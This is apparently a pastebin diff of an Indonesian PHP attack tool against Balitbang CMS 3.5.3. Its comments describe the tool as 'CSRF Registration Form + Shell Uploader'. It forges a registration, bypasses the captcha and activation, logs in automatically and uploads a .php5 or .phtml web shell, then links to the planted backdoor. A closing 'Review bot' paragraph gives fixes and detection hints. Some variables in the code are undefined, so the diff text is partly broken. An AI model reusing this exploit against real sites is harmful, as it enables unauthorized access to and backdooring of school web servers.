View difference between Paste ID: tymZBQEt and ZfHszHCQ
1
<html>
2
<!---
3
// script ini dibuat berdasarkan iseng saja... :)
4
// by. kitasemua
5
// --------------------------
6
// Simpan script ini dengan nama: test.php
7
// - Jika captcha tidak muncul, buka inspect element, arahin cursor ke captcha, ganti link captcha "/functions/captcha/captcha.php" -> "/functions/spam.php"
8
// - Jika bypass login gagal, silahkan login manual, kemudian lanjut upload shellnya
9
// - Format shell: *.phtml, *.php5
10
// --------------------------
11
// Bugs terletak pada /functons/simmateri.php dan /functions/simmateriguru.php
12
// Cara menutup bugs ini: gunakan fungsi batasan ekstensi file seperti di /functions/simlapguru.php
13
// --------------------------
14
// Tunggu Tutorial selanjutnya "Bypass $_SESSION untuk Lokomedia, Balitbang, F0rmulaCMS".
15
// --------------------------
16
-->
17
<head>
18
<title>Balitbang 3.5.3</title>
19
</head>
20
<style type="text/css">
21
input[type=text],input[type=code],input[type=password]{
22
	border:1px solid #c0c0c0;
23
	height:24px;
24
	padding:5px;
25
}
26
body {
27
	background-color: black;
28
	color: #fff;
29
}
30
</style>
31
<body>
32
<?php 
33
function hex($str='',$code='') {
34
  if(($code>=0)and($code<100)) {
35
    $t .=dechex(strlen($str)+$code)."g";
36
    $str=strrev($str);
37
    for($i=0;$i<=strlen($str)-1;$i++) {
38
      $t .=dechex(ord(substr($str,$i,1))+$code);
39
    }
40
  }
41
  return $t;
42
}
43
function unhex($str='',$code='') {
44
  $all=explode("g",$str);
45
  $head=hexdec($all[0])-$code;
46
  $content=$all[1];
47
  if($head==(strlen($content)/2)) {
48
    for($i=0;$i<=$head-1;$i++) {
49
	  $t .=chr(hexdec(substr($content,$i*2,2))-$code);
50
	}
51-
$target = $_GET['target'];
51+
52
  }
53
  return $t;
54
}
55
$target = @$_GET['target'];
56-
$userx = $_GET['n'];
56+
57-
$passx = $_GET['p'];
57+
58
$captcha = $target."/functions/captcha/captcha.php";
59
$ur_login = $target."/member/ajax_login.php";
60
$userx = @$_GET['n'];
61
$passx = @$_GET['p'];
62
if(isset($_POST['next'])){
63
	$tar = $_POST['tar'];
64
	$n = $_POST['n'];
65
	$p = $_POST['p'];
66
	header("Location: test.php?load=daftar&n=".$n."&p=".$p."&target=".$tar."");
67
}
68
echo "CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3) <br>
69
<hr>";
70
?>
71
<form method="post" action="" enctype="multipart/form-data">
72
<table id=tablebaru cellspacing='1' cellpadding='3'>
73
	<tr>
74
		<td>target</td>
75
		<td>:</td>
76
		<td><input type="text" name="tar" size="61" placeholder='http://'/></td>
77
	</tr>
78
	<tr>
79
		<td>username</td>
80
		<td>:</td>
81
		<td><input type="text" name="n" size="61"/></td>
82
	</tr>
83
	<tr>
84
		<td>password</td>
85
		<td>:</td>
86
		<td><input type="text" name="p" size="61"/></td>
87
	</tr>
88
	<tr>
89
		<td></td>
90
		<td></td>
91
		<td><input type="submit" name="next" value="NEXT &raquo;"/></td>
92
	</tr>
93
</table>
94
</form>
95
<hr>
96
<?php if(isset($_GET['load']) && $_GET['load'] == "daftar"){
97
	$asli = hex($userx,"82");
98
	$pass = hex($passx,"82");
99
	echo "username : <b>$userx</b><br>";
100
	echo "password : <b>$passx</b><hr>";
101
?>
102
<form name='formID' action="<?php echo $ur_target;?>" method='post' target='iframe'>
103
<input type=hidden name='userid' value='<?php echo hex("simtambah,","82");?>'>
104
<input type=hidden name='name' value='ganteng'/>
105
<input type=hidden name='username' value='<?php echo $userx;?>'/>
106
<input type=hidden name='password' value='<?php echo $passx;?>'/>
107
<input type=hidden name='email' value='abc@abc.abc'/>
108
<input type=hidden name='kelamin' value='m'/>
109
<input type=hidden name='jenis' value='Tamu'>
110
<input type=hidden name='kelas' value=''/>
111
<input type=hidden name='hari' value='01'/>
112
<input type=hidden name='bulan' value='01'/>
113
<input type=hidden name='tahun' value='1995'/>
114
<input type=hidden name='nis' value=''/>
115
<input type=hidden name='pertanyaan' value='1'/>
116
<input type=hidden name='jawaban' value='1'/>
117
<input type=hidden name='kerja' value='Guru'/>
118
<input type=hidden name='alamat' value='jauh'/>
119
<input type=hidden name='sekolah' value='terserah'/>
120
<input type=hidden name='telp' value='0'/>
121
<input type=hidden name='blog' value=''/>
122
<input type=hidden name='tentang' value='terserah'/>
123
<input type=hidden name='country' value='INDONESIA'/>
124
<input type=hidden name='stprofil' value='open'/>
125
<input type=hidden name='stblog' value='on'/>
126
<table>
127
	<tr>
128
		<td colspan="2" valign="top"><img src='<?php echo $captcha;?>' width='162' height="85"></td>
129
		<td rowspan="2" valign="top"><i>&raquo; capture target...</i><br><iframe name='iframe' width='310' height='90' style="border:1px solid #c0c0c0;"></iframe></td>
130
	</tr>
131
	<tr>
132
		<td valign="top"><input type='text' name='code' size='12' placeholder="captcha"/></td>
133
		<td valign="top"><input type=submit name='submit' value='GO &raquo;'/></td>
134
	</tr>
135
</table>
136
</form>
137
<?php 
138
echo "<!--
139
ini kode registrasinya: valid/index.php?id=".$asli."&p=".$pass."
140
-->
141
";
142
echo "Langkah selanjutnya:<br>1. Setelah registrasi berhasil, <input type='button' value='klik disini' onclick=\"verif.location.href='".$target."/valid/index.php?id=".$asli."&p=".$pass."'\"/> untuk aktivasi/verifikasi!.
143
<br><i>&raquo; capture target...</i><br><iframe name='verif' width='480' height='90' style='border:1px solid #c0c0c0;'></iframe><br>2. Langkah terakhir, Upload backdoornya <input type='button' onclick=\"window.location.href='test.php?load=upload&n=".$userx."&p=".$passx."&target=".$target."'\" value='lewat sini brade!!'/><hr>";
144
} else if(isset($_GET['load']) && $_GET['load'] == "upload"){ 
145
?>
146
<script type="text/javascript">
147
window.onload = function(){
148
  document.forms['login_form'].submit()
149
150
}
151
function setURL(url){
152
    document.getElementById('verif').src = url;
153
}
154
</script>
155
<form method="post" action="<?php echo $ur_login;?>" target='autologin' name='login_form'>
156
	<input type='hidden' name='user_name' value="<?php echo $userx;?>"/>
157
	<input type='hidden' name='password' value="<?php echo $passx;?>"/>
158
	Jika tidak bisa login dihalaman member, <input type='submit' name='submit' value='Klik disini untuk bikin SESSION'/>
159
</form>
160
<div style='margin-top:-20px;'>
161
<iframe name='autologin' width='30' height='30' style="border:0;"></iframe>
162
</div>
163
<form action='<?php echo $ur_upload;?>' method='post' enctype="multipart/form-data" target='golink'>
164
<input type='hidden' name='pesan' value='abcabcabc'/></td>
165
<table cellspacing='1' cellpadding='3'>
166
	<tr>
167
		<td valign='top'>File</td>
168
		<td valign='top'>:</td>
169
		<td valign='top'><input type='file' name='file'></td>
170
		<td valign='top' align='right'><input type='submit' value=' Simpan '/></td>
171
	</tr>
172
	<tr>
173
		<td valign='top' colspan="4"><i>&raquo; capture target...</i><br><iframe name='golink' width='475' height='150' style="border:1px solid #c0c0c0;"></iframe></td>
174
	</tr>
175
	<tr>
176
		<td valign='top' colspan="4">
177
		hasil upload (.php5): <a href="<?php echo $target."/tugas/tgs-ganteng.php5";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.php5";?></a><br>
178
		hasil upload (.phtml): <a href="<?php echo $target."/tugas/tgs-ganteng.phtml";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.phtml";?></a></td>
179
	</tr>
180
</table>
181
<input type=hidden name='st' value='ganteng'>
182
<input type=hidden name='nis' value=''>
183
<input type=hidden name='idtugas' value=''>
184
</form>
185
<hr>
186
<?php } ?>
187
</body>
188
</html>
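Review bot: The remediation line in the header comment (restrict file extensions the way /functions/simlapguru.php does) is too thin for a defender to act on, and the same comment's mention of `*.phtml` and `*.php5` suggests that blocking `.php` alone would not be enough. I would add a line such as `// Fix: allowlist upload extensions, rename files server-side, disable script execution in the upload directory` next to it. The activation link built near the end of the registration branch is just `hex()` of the submitted username and password with a fixed offset, so activation presumably provides no gate on the server side and should rely on a random server-generated token instead. For detection, requests to the two upload handlers named in the header comment followed by a fetch of a `.php5` or `.phtml` file under `/tugas/` are the pattern to look for in web logs.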